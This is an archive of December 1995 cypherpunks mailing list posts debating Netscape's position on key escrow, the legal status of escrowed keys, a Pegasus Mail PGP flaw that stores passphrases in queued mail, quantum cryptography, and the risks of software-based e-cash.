From: djw at pdcorp.com (Dan Weinstein) Date: Sat, 9 Dec 95 16:47:06 PST Subject: Netscape announces position against GAK In-Reply-To: <199512092259.QAA11480@snoopy.vetmed.auburn.edu> Message-ID: <30ca2fb5.20633389@email.pdcorp.com> On Sat, 9 Dec 1995 16:59:13 -0600 (CST), Frank Stuart wrote: >To avoid just saying "me too", I'll throw out another idea on making the U.S. >version of Netscape available to U.S. users over the Internet. How about a >phone number to call to get an access id of some sort that can be used to >FTP the software. When you call the number, you can use caller-id to verify >that the person is calling from within the U.S. You could set up a BBS-type >system to do this automatically, or make the phone number a 900 number and >charge a few dollars to cover your costs. You could also set up the access >id so that it can only be used once. Couldn't caller ID be fooled by call forwarding? I am anything but an expert on caller ID, but this seems like a possible loop hole. This would cause the same kind of problem that is holding up placing the U.S. version on the Web. Dan Weinstein djw at pdcorp.com http://www.earthlink.net/~danjw PGP public key is available from my Home Page. All opinions expressed above are mine. "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From jhupp at novellnet.gensys.com Sat Dec 9 19:42:56 1995 From: jhupp at novellnet.gensys.com (Jeff Hupp) Date: Sat, 9 Dec 95 19:42:56 PST Subject: Warning about Pegasus Mail and PGP (fwd) Message-ID: <34756653250@Novellnet.Gensys.com> -----BEGIN PGP SIGNED MESSAGE----- On 9 Dec 95 at 18:29, Siberia wrote: : Okay, here's how I understand things with PGP and Pegasus. You have two : options with Pegasus depending on the set-up options you choose. You can : either send upon completion of your out-going email, or you can have your mail : queued until you press the send out-going mail button. The actual PGP process : does not occur until you actually send the mail. So the answer would be: : don't queue your mail. That's not really a solution in the Windows environment, if you have a swap file, you never know what gets written out to it. The solution is run w/o a swap file or run an encrypted file system. I run an encrypted file system. Pegasus will indeed save your key with your message in the outgoing queue. This is a problem with the design of pegasus, not with the design of the add on encryptor. : : On 9 Dec 95 at 16:24, Jon Lasser wrote: : : > On Sat, 9 Dec 1995 anonymous-remailer at shell.portal.com wrote: : > : > > I just installed the "Open Encryptor" PGP interface for Pegasus Mail. : > > I found that when you sign a message and queue it, it stores your password : > > in the clear on the hard drive. Apparently : > > it doesn't sign or encrypt the message until just before : > > transmitting it. So it stores your PGP private key password : > > with the message until it sends it. : > : > Can anyone verify this? : > : > Kinda brings new meaning to the term "Open Encryptor," huh? : > : > Jon : > ------------------------------------------------------------------------------ : > Jon Lasser (410)494-3072 : > Visit my home page at http://www.goucher.edu/~jlasser/ : > You have a friend at the NSA: Big Brother is watching. Finger for PGP key. : > : > : > : -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMpJNDUjeCeeebC9AQFsdAf+OY1FPLqSbHYyB+MnUl56dau9gFouoLKf y5UDCE9d4w2ndo6iKOGk7UzfTR3vYQaJmfEI2og+37hi2au01mHm/T0IAUOFYOYr owr6Xn8TZ8vHPOEe71LYRdad60ZdlkPr7H3Nxc9l7O9ueZp0SAM4xPMZmMPUkb8V d4j2m1kbLOHHNmqFmHWjxXvKLaowF/38cgbV9VuDFatySZuM9TdaVQEbazum0uDE LOgUzrQqs2GqlDOB1WMkvJv947SPHhjCJQTcygtS6SoGJv6AzLCL0LtstmBnCOgI zRIrX5wgFSp49BRdmE0/xp62+TuaGCZ6ml8iW/zS9ab7GSeOA2Qs6Q== =GINp -----END PGP SIGNATURE----- -- JHupp at gensys.com |For PGP Public Key: http://gensys.com |finger jhupp at gensys.com Animals can be driven crazy by placing too many in too small a pen. Homo sapiens is the only animal that voluntarily does this to himself. From nobody at c2.org Sat Dec 9 20:09:44 1995 From: nobody at c2.org (Anonymous User) Date: Sat, 9 Dec 95 20:09:44 PST Subject: test Message-ID: <199512100405.UAA24243@infinity.c2.org> this is a test of the cypherpunk w3 anonymous remailer interface. author is N..... B... From jamesd at echeque.com Sat Dec 9 20:45:16 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 9 Dec 95 20:45:16 PST Subject: Netscape announces position against GAK Message-ID: <199512100446.UAA00146@blob.best.net> At 04:27 AM 12/9/95 -0800, Timothy C. May wrote: >Credit where credit is due. > >I for one am satisfied--and even pleased--with the Netscape position on GAK. Well I for one, am serious unsatisfied, but it is not so bad as to merit a campaign against Netscape. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From unicorn at schloss.li Sat Dec 9 21:17:12 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 9 Dec 95 21:17:12 PST Subject: Netscape announces position against GAK In-Reply-To: <199512100446.UAA00146@blob.best.net> Message-ID: On Fri, 8 Dec 1995, James A. Donald wrote: > At 04:27 AM 12/9/95 -0800, Timothy C. May wrote: > >Credit where credit is due. > > > >I for one am satisfied--and even pleased--with the Netscape position on GAK. > > Well I for one, am serious unsatisfied, but it is not so bad as > to merit a campaign against Netscape. I think it's a good start. I would like to see how much effort after this really pans out. Doesn't take much to put out a policy statement. Takes a lot to follow it through. > --------------------------------------------------------------------- > | > We have the right to defend ourselves | http://www.jim.com/jamesd/ > and our property, because of the kind | > of animals that we are. True law | James A. Donald > derives from this right, not from the | > arbitrary power of the state. | jamesd at echeque.com > > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From bdavis at thepoint.net Sat Dec 9 22:00:33 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 9 Dec 95 22:00:33 PST Subject: Is there a lawyer in the house? In-Reply-To: <9512072127.AA28756@tis.com> Message-ID: On Thu, 7 Dec 1995 cme at acm.org wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > >Date: Sat, 2 Dec 1995 03:39:00 -0500 (EST) > >From: Black Unicorn > >Subject: Re: Netscape gives in to key escrow > > >An individual has no legitimate expectation of privacy in the encryption > >numbers in his GAK browser, we reasoned, because he voluntarily conveyed > >those numbers to the government when he purchased the software. > > It could be even worse. I was on a panel last year with Scott Charney (sp?) > (I believe from DoJ) during which he commented that if you give your secret > key to anyone -- e.g., your own company -- then you have given up the > presumption of privacy. That leaves the police open to get that secret > without a warrant. This claim should be checked by a real lawyer. > I suspect that Charney was referring to the fact that the third party keyholder could be compelled to surrender your key under subpoena without having any right against self-incrimination invoked. And in that, of course, he was correct. (But if you give it to your lawyer, for example, the communication is privileged ...). EBD > +--------------------------------------------------------------------------+ > |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | From FredNix at msn.com Sat Dec 9 22:20:46 1995 From: FredNix at msn.com (Fred Nix) Date: Sat, 9 Dec 95 22:20:46 PST Subject: anonymous remailer Message-ID: Hey... How do I gain acess to the remailer? Thanks! Fred Nix From bdavis at thepoint.net Sat Dec 9 22:27:59 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 9 Dec 95 22:27:59 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: On Fri, 8 Dec 1995, Black Unicorn wrote: > On Thu, 7 Dec 1995, Jeff Weinstein wrote: > > > Black Unicorn wrote: > > > > > > On Thu, 7 Dec 1995, sameer wrote: > > > > > How about if Bob had a contractual agreement with Alice to keep his > > key secret? > > Then as a defense attorney, I would argue that Bob had an obvious > expectation of privacy with Alice, and that the fact that he relayed this > key to Alice only under those circumstances represents a definite > expression of his intent to keep the key private, thus triggering 4th > amendment protections. My view is that this would be a very strong argument. Bob's Fourth Amendment rights are not triggered by his contract with Alice. Alice can be compelled to give up the key (by testimony or production) and giving up that key does not tend to incriminate *Alice* in a violation of law. Alice can't invoke Bob's rights against self-incrimination for obvious reasons: Alice isn't Bob. ^^^^ EBD > > Note that this is an academic opinion, not a legal one as I am not being > paid. > > > > > --Jeff > > > > -- > > Jeff Weinstein - Electronic Munitions Specialist > > Netscape Communication Corporation > > jsw at netscape.com - http://home.netscape.com/people/jsw > > Any opinions expressed above are mine. > > --- > My prefered and soon to be permanent e-mail address: unicorn at schloss.li > "In fact, had Bancroft not existed, potestas scientiae in usu est > Franklin might have had to invent him." in nihilum nil posse reverti > 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From bdavis at thepoint.net Sat Dec 9 22:40:16 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 9 Dec 95 22:40:16 PST Subject: Escrow expectations In-Reply-To: Message-ID: On Fri, 8 Dec 1995, Russell Nelson wrote: > Duncan Frissell writes: > > At 09:17 AM 12/8/95 -0500, Adam Shostack wrote: > > > > > "Your honor, we argue that in escrowing his keys with the US > > >government, the defendant should have known his communications could > > >be listened to, and thus has no expectation of privacy." > > > > If Clipper were mandated you might be able to resist a prosecution for > > "failure to file" keys or for double encrypting your transmissions if you > > could prove that you were transmitting illegal messages or evidence of a > > crime. Just as those who possess illegal weapons are not required to ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > register them (self incrimination). You have to be sure your traffic is ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ You are mistaken here. Failure to get a permit before turning a semi-auto firearm into a fully-auto machine gun, for example, is illegal as is possessing an unregistered machine gun ... EBD > > illegal though otherwise no protection. > > To bring two cypherpunks threads together: > > That SHIT should be FUCK no DAMN problem ANAL whatsoever in a few SEX > months. > > -russ http://www.crynwr.com/~nelson > Crynwr Software | Crynwr Software sells packet driver support | PGP ok > 11 Grant St. | +1 315 268 1925 voice | Flushing, NY. Not just a suburb, > Potsdam, NY 13676 | +1 315 268 9201 FAX | it's a good idea in general. > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From unicorn at schloss.li Sat Dec 9 22:53:53 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 9 Dec 95 22:53:53 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: On Sun, 10 Dec 1995, Brian Davis wrote: > On Fri, 8 Dec 1995, Black Unicorn wrote: > > > On Thu, 7 Dec 1995, Jeff Weinstein wrote: > > > > > Black Unicorn wrote: > > > > > > > > On Thu, 7 Dec 1995, sameer wrote: > > > > > > > How about if Bob had a contractual agreement with Alice to keep his > > > key secret? > > > > Then as a defense attorney, I would argue that Bob had an obvious > > expectation of privacy with Alice, and that the fact that he relayed this > > key to Alice only under those circumstances represents a definite > > expression of his intent to keep the key private, thus triggering 4th > > amendment protections. My view is that this would be a very strong > > argument. > > Bob's Fourth Amendment rights are not triggered by his contract with > Alice. Alice can be compelled to give up the key (by testimony or > production) and giving up that key does not tend to incriminate *Alice* > in a violation of law. Alice can't invoke Bob's rights against > self-incrimination for obvious reasons: Alice isn't Bob. > ^^^^ You've taken the narrow answer I was trying to give out of context. As for fifth amendment questions, That's another discussion entirely. If this was not an error, then you have still taken the question way beyond the narrow scope I was addressing. I was answering only as to how the manifestation of Bob's privacy interest might impact the argument that the key was no longer a protected interest acording to the Smith v. Maryland ruling, and thus unprotected by the fourth amendment on those grounds. (Assuming it would even be applied to the Bob - Alice relationship in terms of crypto keys). Your statement "Bob's Fourth Amendment rights are not triggered by his contract with Alice." Is probably correct in the event the key is obtained from Alice. It may not be if the key is obtained by electronic measures or otherwise without a warrant and then the argument is made after the fact that Bob has exerted no expectation of privacy over the key. This is the key question which bears on the key escrow's effect on Bob's protection (Alice in that example being the escrow agent). Clearly Alice in that circumstance is unlikely to give up the key without a warrant. The real worry is that the authorities are given free reign to obtain the key by other methods from Bob, or Bob's communications without a warrant by the mere fact that Bob has "tendered" the information to Alice (the escrow agent). Again, I'm addressing the narrow issue of voluntary surrendering of key information to an escrow agent and it's effect on the 'third party' rule in Smith v. Maryland, not the eventual outcome of an exclusionary hearing. > EBD > > Not a lawyer on the Net, although I play one in real life. > ********************************************************** > Flame away! I get treated worse in person every day!! --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From DMiskell at envirolink.org Sat Dec 9 23:02:34 1995 From: DMiskell at envirolink.org (Daniel Miskell) Date: Sat, 9 Dec 95 23:02:34 PST Subject: The Elevator Problem Message-ID: <9512100703.AA27209@envirolink.org> There is an easy way to develop a secret key in front any number of eves, be they experts or not, without the eves knowing what the key is. Even if they tap your phone/comm line, ect. There was an article in Discovery Magazine a couple of years ago, talking about how to use photons and their randomness as the perfect, uncrackable code. Use of the photons aside, there was a key generation method discussed, simple, yet secure enough to work out on a tapped phone. Let me root around. Regards, Munster. --- _________________________________ *!Cheese Doctrine:!* Though cultured over time, and aged to perfection, one must not yield to produce mold. One must also not belittle themselves by conforming to the "whiz", but melt over the unprocessed ideas of Ghuda. _________________________________ From bdavis at thepoint.net Sat Dec 9 23:29:07 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 9 Dec 95 23:29:07 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: On Sun, 10 Dec 1995, Brian Davis wrote: > > Bob's Fourth Amendment rights are not triggered by his contract with ^^^^^^ Ack. Meant "Fifth." (Although Bob's Fourth Amendment rights are not triggered either.) > Alice. Alice can be compelled to give up the key (by testimony or > production) and giving up that key does not tend to incriminate *Alice* > in a violation of law. Alice can't invoke Bob's rights against > self-incrimination for obvious reasons: Alice isn't Bob. > ^^^^ > EBD > From bdavis at thepoint.net Sat Dec 9 23:32:53 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sat, 9 Dec 95 23:32:53 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: On Sun, 10 Dec 1995, Black Unicorn wrote: > On Sun, 10 Dec 1995, Brian Davis wrote: > > > On Fri, 8 Dec 1995, Black Unicorn wrote: > > > > > On Thu, 7 Dec 1995, Jeff Weinstein wrote: > > > > > > > Black Unicorn wrote: > > > > > > > > > > On Thu, 7 Dec 1995, sameer wrote: > > > > > > > > > How about if Bob had a contractual agreement with Alice to keep his > > > > key secret? > > > > > > Then as a defense attorney, I would argue that Bob had an obvious > > > expectation of privacy with Alice, and that the fact that he relayed this > > > key to Alice only under those circumstances represents a definite > > > expression of his intent to keep the key private, thus triggering 4th > > > amendment protections. My view is that this would be a very strong > > > argument. > > > > Bob's Fourth Amendment rights are not triggered by his contract with > > Alice. Alice can be compelled to give up the key (by testimony or > > production) and giving up that key does not tend to incriminate *Alice* > > in a violation of law. Alice can't invoke Bob's rights against > > self-incrimination for obvious reasons: Alice isn't Bob. > > ^^^^ > > You've taken the narrow answer I was trying to give out of context. > As for fifth amendment questions, That's another discussion entirely. If > this was not an error, then you have still taken the question way beyond the > narrow scope I was addressing. You are correct: I didn't realize/remember/whatever that you were limiting the remarks to the narrow scope you set forth below. And on the point you were addressing, I agree with you. Sorry to have added the fog ... EBD > I was answering only as to how the manifestation of Bob's privacy > interest might impact the argument that the key was no longer a protected > interest acording to the Smith v. Maryland ruling, and thus unprotected > by the fourth amendment on those grounds. (Assuming it would even be > applied to the Bob - Alice relationship in terms of crypto keys). > > Your statement "Bob's Fourth Amendment rights are not triggered by his > contract with Alice." Is probably correct in the event the key is > obtained from Alice. It may not be if the key is obtained by electronic > measures or otherwise without a warrant and then the argument is made > after the fact that Bob has exerted no expectation of privacy over the > key. This is the key question which bears on the key escrow's > effect on Bob's protection (Alice in that example being the escrow > agent). Clearly Alice in that circumstance is unlikely to give up the > key without a warrant. The real worry is that the authorities are given > free reign to obtain the key by other methods from Bob, or Bob's > communications without a warrant by the mere fact that Bob has "tendered" > the information to Alice (the escrow agent). > > Again, I'm addressing the narrow issue of voluntary surrendering of key > information to an escrow agent and it's effect on the 'third party' > rule in Smith v. Maryland, not the eventual outcome of an exclusionary > hearing. > > > EBD > > > > Not a lawyer on the Net, although I play one in real life. > > ********************************************************** > > Flame away! I get treated worse in person every day!! > > --- > My prefered and soon to be permanent e-mail address: unicorn at schloss.li > "In fact, had Bancroft not existed, potestas scientiae in usu est > Franklin might have had to invent him." in nihilum nil posse reverti > 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From unicorn at schloss.li Sat Dec 9 23:47:40 1995 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 9 Dec 95 23:47:40 PST Subject: Is there a lawyer in the house? In-Reply-To: Message-ID: Brian Davis wrote: > > > > > On Fri, 8 Dec 1995, Black Unicorn wrote: > > You've taken the narrow answer I was trying to give out of context. > > As for fifth amendment questions, That's another discussion entirely. If > > this was not an error, then you have still taken the question way beyond the > > narrow scope I was addressing. > > You are correct: I didn't realize/remember/whatever that you were > limiting the remarks to the narrow scope you set forth below. > And on the point you were addressing, I agree with you. > > Sorry to have added the fog ... Not a problem I could have been clearer. > Not a lawyer on the Net, although I play one in real life. > ********************************************************** > Flame away! I get treated worse in person every day!! --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From daw at lagos.CS.Berkeley.EDU Sun Dec 10 00:25:37 1995 From: daw at lagos.CS.Berkeley.EDU (David A Wagner) Date: Sun, 10 Dec 95 00:25:37 PST Subject: Still more on the Digicash protocol Message-ID: <199512100823.DAA05954@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , Rev. Mark Grant wrote: > > Exactly.. once you have an active attack set up, it's trivial, but setting > that up is quite hard. > But before everyone pats themselves on the back, congratulating themselves on how hard an active attack is to set up, look at http://www.EnGarde.com/software/ipwatcher/ Yes, folks, a commercial program which mounts an active attack. (Check out the GUI! Click on the `Watch Mail' control! Activate the `Take over' button! Whee, mom, hacking is fun!) Active attacks may not be trivial, but they aren't exactly rocket science, either -- and they're for sale. - -- Dave `is capitalism the best thing since sliced bread, or what?' Wagner - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMqY/ioZzwIn1bdtAQEkGQF/WdJBqbP5HwTDxldi0UDCmP2RZAFz5p2q cPMSoOIgkFbaBS34k4LSFPKcvegw3tJk =Ptyf -----END PGP SIGNATURE----- From ecarp at netcom.com Sun Dec 10 01:05:18 1995 From: ecarp at netcom.com (Ed Carp) Date: Sun, 10 Dec 95 01:05:18 PST Subject: Whew! Message-ID: <199512101007.EAA23520@khijol> I just finished leafing through Schneier's "Applied Cryptography", second edition. Lots of new stuff, good and very thorough coverage of protocols and implementations, including weaknesses and processes behind same. If an idiot like me can understand this stuff (and if you don't believe I'm an idiot, just ask Perry), anyone can. I highly recommend the book, it's an absolute bargain at $50 USD. Should be required reading for anyone before being allowed to post here. :) From s1113645 at tesla.cc.uottawa.ca Sun Dec 10 01:24:57 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Sun, 10 Dec 95 01:24:57 PST Subject: The Elevator Problem In-Reply-To: <9512100703.AA27209@envirolink.org> Message-ID: On Sun, 10 Dec 1995, Daniel Miskell wrote: > There is an easy way to develop a secret key in front any number of eves, be > they experts or not, without the eves knowing what the key is. Even if they > tap your phone/comm line, ect. There was an article in Discovery Magazine a > couple of years ago, talking about how to use photons and their randomness as > the perfect, uncrackable code. Use of the photons aside, there was a key > generation method discussed, simple, yet secure enough to work out on a tapped > phone. Let me root around. You must mean quantum crypto, by G. Brassard and C. Crepeau of U de Montreal. Requires a direct fiber optic line from pt. A to B, in order to be secure, if I am not mistaken. Which makes it impractical for most people, as there are usually switches (or whatever they're called) and more than one line in between. Lets you use OTPs with your next-door neighbor though. From ecarp at netcom.com Sun Dec 10 02:12:00 1995 From: ecarp at netcom.com (Ed Carp) Date: Sun, 10 Dec 95 02:12:00 PST Subject: More FUD from First Virtual Message-ID: <199512101114.FAA26720@khijol> > From: Adam Shostack > Subject: Re: More FUD from First Virtual > To: jimbell at pacifier.com (jim bell) > Date: Sat, 9 Dec 1995 16:51:58 -0500 (EST) > Cc: cypherpunks at toad.com > jim bell wrote: > > [Good points about cost of transactions deleted] > > | The answer, I think, it that there would be no problem finding people to > | take that risk in exchange for the return, ESPECIALLY if they have some > | input into the design (level of security) of the system. They might insist > | on 2048-bit RSA keys, instead of 1024-bit, for example. > > (I know its only an example, but...) > > Key length is not what is needed for better security; more > solid code and better interfaces are needed. (I might also argue for > hardware keys that are more difficult to steal..) Nonsense. The code is pretty solid, the interfaces aren't very difficult. What is needed is better human management of keys. Why brute-force, why look for weak keys, why bother calculating how much safer 2047-bit keys are rather than 1024-bit keys when someone can look on your HD and find your secret key, when they can open your desk drawer and find your pass phrase or password, when they can guess that you used your wife's maiden name as your password? Adam, I don't understand why you wrote nonsense in the first paragraph, then followed it up with textbook attacks such as: > Cryptosystems fail because of bad storage of keys, coding > mistakes, accidentally writing passphrases to disk during a swap, etc. > Moving to 2048 bit keys is no help if you lose the key to a > non-cryptanalytic attack. Moving to keys with a week or day lifetimes > might be better. Moving the systems which automatically issue key revocation certificates, and coupling that with a wide distribution system would be the perfect match to such a scheme. Of course, that means that PGP et. al. needs to be more tightly integrated into existing mail software. From gbroiles at darkwing.uoregon.edu Sun Dec 10 03:10:18 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Sun, 10 Dec 95 03:10:18 PST Subject: GAK and self-incrimination? Message-ID: <199512101057.AA07992@ideath.goldenbear.com> Tim May writes: >Consider this hypo: I send an encrypted message to a partner in crime >containing plans for future crimes and descriptions of past crimes. I don't >GAK the message. The government prosecutes me under the Anti-Terrorism and >Child Protection Act of 1997. > >My defense? That GAKKing the message would be tantamount to incriminating >myself, which the Fifth Amendment protects me against. The Fifth protects you against *compelled* self-incrimination - in particular, the right to be free from the "cruel trilemma" of o conviction of a substantive crime, based on your (true) testimony o conviction of perjury, for lying when asked to incriminate yourself o contempt of court sanctions, for refusing to answer but your hypo doesn't seem to create that forbidden situation. In particular, you're free to simply not send the message at all. (this message, sent from my Windows box, isn't PGP signed. Doh. signatures will return when the Unix box is net-functional again.) -- "The anchored mind screwed into me by the psycho- Greg Broiles lubricious thrust of heaven is the one that thinks every temptation, every desire, every inhibition." greg at goldenbear.com -- Antonin Artaud gbroiles at darkwing.uoregon.edu From nobody at REPLAY.COM Sun Dec 10 03:30:27 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 10 Dec 95 03:30:27 PST Subject: Warning about Pegasus Mail and PGP (fwd) Message-ID: <199512101130.MAA12736@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- On 9 Dec 95 at 21:43, Jeff Hupp wrote: > On 9 Dec 95 at 18:29, Siberia wrote: > : Okay, here's how I understand things with PGP and Pegasus. > : You have two options with Pegasus depending on the set-up > : options you choose. You can either send upon completion of > : your out-going email, or you can have your mail queued > : until you press the send out-going mail button. The actual > : PGP process does not occur until you actually send the > : mail. So the answer would be: don't queue your mail. > That's not really a solution in the Windows environment, if > you have a swap file, you never know what gets written out > to it. The solution is run w/o a swap file or run an > encrypted file system. I run an encrypted file system. Oh, PLEASE! Do you HAVE to go and mix up two completely different issues? Aren't the nontechnical people trying to follow these things likely to be confused enough without your adding to that confusion? For every person who really understands the technical issues there are probably a thousand or ten thousand who are just trying to *use* the stuff without stepping into a deep hole. An OS swap file is one kind of hole. What Siberia is writing about is ANOTHER type of hole. If I wipe my swap file after each use of my machine and don't know that Pegasus is doing this, or think that because of what you wrote I'm no worse off, I've been done a serious disservice. > Pegasus will indeed save your key with your message in the > outgoing queue. This is a problem with the design of > pegasus, not with the design of the add on encryptor. How about saying something USEFUL, like yes or no to the question of whether sending WITHOUT queueing will make any difference? How about agreeing that if David Harris hopes to provide a useful interface to external "encryptors" he will have to do something about this? How about cc'ing David? Somebody else could as well point out that we're all full of crap because we don't use Amigas, and while he might have a point, it wouldn't be a very useful one. We Jurgar Din (that will have to suffice: I do not yet live in a free country) +"The battle, Sir, is not to the strong alone. It is to the+ +vigilant, the active, the brave. Besides, Sir, we have no + +election. If we were base enough to desire it, it is now + +too late to retire from the contest." -Patrick Henry 1775 + -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMq8MUjw99YhtpnhAQHA2wIAo72mzD7yNYy2btraeMg92hkekW/ik/hR SILC97a/gTGtZJiHV0MLcGETgZL51kFPQ3pRx+BGZl5g8JdRAQ2ZpQ== =gOtF -----END PGP SIGNATURE----- From nsb at nsb.fv.com Sun Dec 10 05:58:01 1995 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sun, 10 Dec 95 05:58:01 PST Subject: More FUD from First Virtual In-Reply-To: Message-ID: I think Adam's already covered the red herring of key length. You can use 4-billion-bit keys and it won't help prevent an attack based on stealing secret keys. Ed Carp hit the nail on the head when he wrote: > What is needed is better human management of keys. Why > brute-force, why look for weak keys, why bother calculating how much > safer 2047-bit keys are rather than 1024-bit keys when someone can > look on your HD and find your secret key, when they can open your > desk drawer and find your pass phrase or password, when they can > guess that you used your wife's maiden name as your password? What some people seem to miss is that, in the absence of hardware keys (which I believe is the only workable long term solution for mass-market cryptography), this sort of thing is just plain too easy. If a Windows cryptoprogram stores its secret keys in a known location, I can write a Windows virus that flies through the net and steals zillions. If the program insists on making the users insert a floppy every time, the program's perceived usability will go through the floor, and people will find workarounds. In any event, I could write a virus that sits in front of the e-cash program and steals your keys when next you run the e-cash program. Software's just too easy to fool. That's why I regard the risk of catastrophe as being fairly large in software-based e-cash schemes. Jim, I never denied that some banks would be willing to take the risk (in fact, read my post, I said just the opposite). What I said was that the assumption of the risk would carry a significant underwriting cost, which would be, in essence, the "cost of anonymity" when comparing payment systems. Finally Jim writes: > Your arguments seem to only be qualitative, not quantitative. Maybe that's > why the other guy calls them "FUD." I'm saying that there will be a high underwriting cost for anonymous cash, and that this will make it much more expensive than non-anonymous payment systems. To my mind, that's a discussion about quantity of costs, not quality. If you want me to give you numbers, I'm sorry, but I can't -- I'm not a banker or an actuary, and a lot of leg work would be required to come up with a precise number in any event. If I were a banker, however, I think I'd be too conservative to underwrite e-cash at any price, and would suggest that you find a less risk-averse banker. -- Nathaniel -------- Nathaniel Borenstein | (Tense Hot Alien In Barn) Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON: FAQ & PGP key: nsb+faq at nsb.fv.com | http://www.netresponse.com/zldf From jhupp at novellnet.gensys.com Sun Dec 10 06:30:26 1995 From: jhupp at novellnet.gensys.com (Jeff Hupp) Date: Sun, 10 Dec 95 06:30:26 PST Subject: Warning about Pegasus Mail and PGP (fwd) Message-ID: <3521BB467F3@Novellnet.Gensys.com> -----BEGIN PGP SIGNED MESSAGE----- On 10 Dec 95 at 12:30, Anonymous wrote: : On 9 Dec 95 at 21:43, Jeff Hupp wrote: : : > On 9 Dec 95 at 18:29, Siberia wrote: : : > : Okay, here's how I understand things with PGP and Pegasus. : > : You have two options with Pegasus depending on the set-up : > : options you choose. You can either send upon completion of : > : your out-going email, or you can have your mail queued : > : until you press the send out-going mail button. The actual : > : PGP process does not occur until you actually send the : > : mail. So the answer would be: don't queue your mail. : : > That's not really a solution in the Windows environment, if : > you have a swap file, you never know what gets written out : > to it. The solution is run w/o a swap file or run an : > encrypted file system. I run an encrypted file system. : : Oh, PLEASE! Do you HAVE to go and mix up two completely : different issues? Aren't the nontechnical people trying to : follow these things likely to be confused enough without your : adding to that confusion? For every person who really : understands the technical issues there are probably a thousand : or ten thousand who are just trying to *use* the stuff without : stepping into a deep hole. : : An OS swap file is one kind of hole. What Siberia is writing : about is ANOTHER type of hole. If I wipe my swap file after : each use of my machine and don't know that Pegasus is doing : this, or think that because of what you wrote I'm no worse off, : I've been done a serious disservice.] So, I shouldn't take the opportunity to tell those non-technical people about the other "hole" they most likely have? After all this only effects Windows users and it is a problem with windows. Read what I wrote, I did not say the original post was in error about not queuing mail and saw no reason to repeat what appears to be a fact. And, if the non technical people don't know about the swap file problem, and just assume that if they don't queue mail they are no worse off then they have been don a serious disservice. BTY, did you check it out? Or just take what you saw as an opportunity to rant? : : > Pegasus will indeed save your key with your message in the : > outgoing queue. This is a problem with the design of : > pegasus, not with the design of the add on encryptor. : : How about saying something USEFUL, like yes or no to the : question of whether sending WITHOUT queueing will make any : difference? How about agreeing that if David Harris hopes to : provide a useful interface to external "encryptors" he will : have to do something about this? How about cc'ing David? : : Somebody else could as well point out that we're all full of : crap because we don't use Amigas, and while he might have a : point, it wouldn't be a very useful one. : Yes, it would have been a WONDERFUL opportunity to drop a O/S v. O/S troll on the list, notice I didn't. What I did do, was write up a problem description and mail it to David Harris. This based on the likelyhood that he doesn't read cypherpunks. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMMrgqTUjeCeeebC9AQG3gwf/VdD9J/KJ1Tau3/L8BLoZ1v6ACAc93zcP 4F1MDoeX7EMSjWqGFZvsh0ev9hgciXvId9lu7tfMqIXQdolHzjXiyPXaw3qEa1Id A80j+Z7OKB9RSz9LKHQqjrrqpANDbJ16LIztYW5r9YjMSntWX9OF7MzeZ0BJRYc4 d1oWnhHqnF6K9rX2XWDveXyQJgCnu2sZw6nNXi0V61OdhBc/QmPsjBp+u7aig+i8 vdC7EJh2znKsNqlQqiJmHnfTbGuoVZGQkc/71hpD2reLzcU7W/NQwM7rL4PFGyDg QA15LXcfKsp6p0JCdZc+bvUfpH5mQQFWm4kd6sY7knjO3fKuTc7jpg== =Li0A -----END PGP 